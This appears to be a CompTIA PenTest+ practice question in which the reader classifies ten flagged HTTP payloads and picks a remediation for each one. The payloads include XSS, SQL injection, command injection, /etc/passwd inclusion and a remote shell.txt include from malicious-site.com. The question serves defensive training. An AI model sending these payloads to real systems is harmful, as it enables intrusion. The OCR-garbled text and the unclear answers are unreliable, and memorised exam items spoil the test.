Question 7 of 52 from exam PT0-001: CompTIA PenTest+
Question
HOTSPOT - You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS - Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
![HTTP Request Payload Table
Payloads
#inner-tab"><scriptoalert(1)</script>
item-widget’ ;waitfor%20delay%20 "00:00:20"
item-widget%20union%20select%2@nu11, null, @@version; --
search=Bob"X3e%3c img%20srcX3dak200nerror&3dalert(1)%3e
item-widget*+convert(int,@@version)+"
site=ww.exa’ ping%20-c&2010%20localhost ‘mple.com
redin=http:%2f%2Fuww.malicious-site.com
logfile=%2fetc%2fpasswdX00
lookup=$(whoami )
logFile=http:%2#%2fww.malicious-site.con%2fshell.txt
Vulnerability Type
Remediation
‘Command Injection
[Parameterized queries
‘DOM-based Cross Site Scripting
Preventing extemal calls,
‘SQL Injection (Error)
Input Sanitization .. ,\, /, sandbox requests|
‘SQL Injection (Stacked)
Input Sanitization. S [
‘SQL Injection (Union)
Input Sanitization
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
‘URL Redirect
‘Command injection
Parameterized queries
DOM-based Cross Site Scripting
Preventing external calls
‘SQL Injection (Error)
Input Sanitization ... \, 7, sandbox requests|
‘SQL Injection (Stacked)
Input Sanitization * 8, [.].(.).
‘SQL Injection (Union)
Input Sanitization
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
‘Command Injection
[Parameterized queries
‘DOM-based Cross Site Scripting
Preventing extemal calls
‘SQL Injection (Error) input Sanitization ...\,/, sandbox requests
‘SQL Injection (Stacked) Input Sanitization =, $.[.].(.).
‘SQL Injection (Union) Input Sanitization
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
‘Command injection
[Parameterized queries
‘DOM-based Cross Site Scripting
Preventing external calls,
‘SQL Injection (Error)
Input Sanitization ... \, 7, sandbox requests|
‘SQL Injection (Stacked)
Input Sanitization * 8, (1. (.).
‘SQL Injection (Union)
Input Sanitization *., <,:, >,
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
‘URL Redirect
‘Command Injection
Parameterized queries
‘DOM-based Cross Site Scripting
Preventing extemal calls,
SQL Injection (Error)
Input Sanitization .. \, /, sandbox requests|
‘SQL Injection (Stacked)
Input Sanitization‘, 8, [
‘SQL Injection (Union)
Input Sanitization
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
‘URL Redirect
‘Command Injection
[Parameterized queries
DOM-based Cross Site Scripting
Preventing extemal calls
‘SQL Injection (Error)
Input Sanitization ... \, 7, sandbox requests|
‘SQL Injection (Stacked)
Input Sanitization * $,[.1.(),
‘SQL Injection (Union)
Input Sanitization =, <,:, >,-,
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
‘Command Injection
Parameterized queries
‘DOM-based Cross Site Scripting
Preventing external calls,
‘SQL Injection (Error)
input Sanitization ..\, 7, sandbox requests
‘SQL Injection (Stacked)
input Sanitization * :, $,{.. (.)
‘SQL Injection (Union)
Input Sanitization *, <,:, >,
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
(Command Injection
[Parameterized queries
‘DOM-based Cross Site Scripting
Preventing extemal calls
‘SQL Injection (Error)
Input Sanitization. \, /, sandbox requests|
‘SQL injection (Stacked)
Input Sanitization * , $, [.1.(.).
‘SQL Injection (Union)
Input Sanitization Ps
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
‘Command injection
Parameterized queries
‘DOM-based Cross Site Scripting
Preventing external calls,
‘SQL injection (Error)
input Sanitization .. \, 7, sandbox requests
‘SQL Injection (Stacked)
Input Sanitization * = S.[
‘SQL Injection (Union)
Input Sanitization
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
(Command Injection
[Parameterized queries
‘DOM-based Cross Site Scripting
Preventing extemal calls,
‘SQL Injection (Error)
Input Sanitization .. ,\, 7, sandbox requests|
‘SQL Injection (Stacked)
Input Sanitization”. .$.[
‘SQL Injection (Union)
Input Sanitization *", <,:, >, -,
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect](https://eaeastus2.blob.core.windows.net/optimizedimages/assets/media/exam-media/03984/0000500001.png)
Explanations
![HTTP Request Payload Table
Payloads
#inner-tab"><scriptoalert(1)</script>
item-widget’ ;waitfor%20delay%20 "00:00:20"
item-widget%20union%20select%2@nu11, null, @@version; --
search=Bob"%3e%3cimgk20src%3da%20onerror%3dalert (1)%3e
item-widget*+convert(int,@@version)+"
sitesmar.exa' ping%20-c&2010%201ocalhost ‘mple.com
redin=http:%2f%2Fuww.malicious-site.com
logfile=%2fetc%2Fpasswa%0o
lookup=$(whoami )
logFile=http:%2#%2fww.malicious-site.con%2fshell.txt
Vulnerability Type
Remediation
‘Command injection
‘DOM-based Cross Site Scripting
‘SQL Injection (Error)
SQL Injection (Stacked)
‘SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
Parameterized queries
Preventing extemal calls
Input Sanitization ...\,/, sandbox requests
Input Sanitization *,:, $.[.1.(.).
Input Sanitization“, <,:, >. ~
‘Command injection
‘DOM-based Cross Site Scripting
‘SQL injection (Error)
SQL Injection (Stacked)
SQL injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File inclusion
URL Redirect
Parameterized queries
Preventing external calls
Input Sanitization ... \, 7, sandbox requests|
Input Sanitization * :, §, [.}.(.)
Input Sanitization ™., <,:,>,-,
‘Command injection
‘DOM-based Cross Site Scripting
‘SQL Injection (Error)
‘SQL Injection (Stacked)
‘SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File inclusion
URL Redirect
Parameterized queries
Preventing extemal calls,
input Sanitization ...\, 7, sandbox requests
Input Sanitization * =, $,[.].(.).
Input Sanitization *, <, :, >, ~
‘Command injection
‘DOM-based Cross Site Scripting
‘SQL Injection (Error)
‘SQL Injection (Stacked)
‘SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File inclusion
URL Redirect
Parameterized queries
Preventing extemal calls
Input Sanitization ... \, 7, sandbox requests|
Input Sanitization *, =, $,[.]. (.).
input Sanitization *, <
‘Command injection
‘DOM-based Cross Site Scripting
SQL Injection (Error)
‘SQL Injection (Stacked)
‘SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File inclusion
URL Redirect
[Parameterized queries
Preventing extemal calls
Input Sanitization... \./, sandbox requests
Input Sanitization ' :,§, {,},(.)
input Sanitization *, <,:, >
‘Command Injection
DOM-based Cross Site Scripting
‘SQL Injection (Error)
SQL injection (Stacked)
‘SQL Injection (Union)
Reflected Cross Site Scripting
Local File inclusion
Remote File inclusion
URL Redirect
[Parameterized queries
Preventing extemal calls,
Input Sanitization ... \, 7, sandbox requests|
input Sanitization *, :, $, [. 1. (.).
Input Sanitization, <,:,>,-
‘Command injection
‘DOM-based Cross Site Scripting
SQL injection (Error)
‘SQL Injection (Stacked)
SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File inclusion
URL Redirect
Parameterized queries
[Preventing extemal calls
Input Sanitization ... \,/, sandbox requests
Input Sanitization "=, $.{.}.(.)
input Sanitization ~
‘Command injection
‘DOM-based Cross Site Scripting
‘SQL Injection (Error)
SQL Injection (Stacked)
‘SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File inclusion
URL Redirect
Parameterized queries
Preventing extemal calls
Input Sanitization ... \, 7, sandbox requests|
input Sanitization ,:. $. [.].(.).
Input Sanitization *,, <,:, >. -
‘Command injection
DOM-based Cross Site Scripting
‘SQL injection (Error)
‘SQL Injection (Stacked)
SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File inclusion
URL Redirect,
[Parameterized queries
Preventing extemal calls.
Input Sanitization ...\, /, sandbox requests
Input Sanitization * :. §, {.]. ()
Input Sanitization *", <,:, >,
‘Command Injection
‘DOM-based Cross Site Scripting
SQL Injection (Error)
‘SQL Injection (Stacked)
‘SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect
Parameterized queries
[Preventing extemal calls
Input Sanitization ...\,/, sandbox requests
Input Sanitization”. =, $.{.1.(.).
input Sanitization, <,:, >, -,](https://eaeastus2.blob.core.windows.net/optimizedimages/assets/media/exam-media/03984/0000600001.png)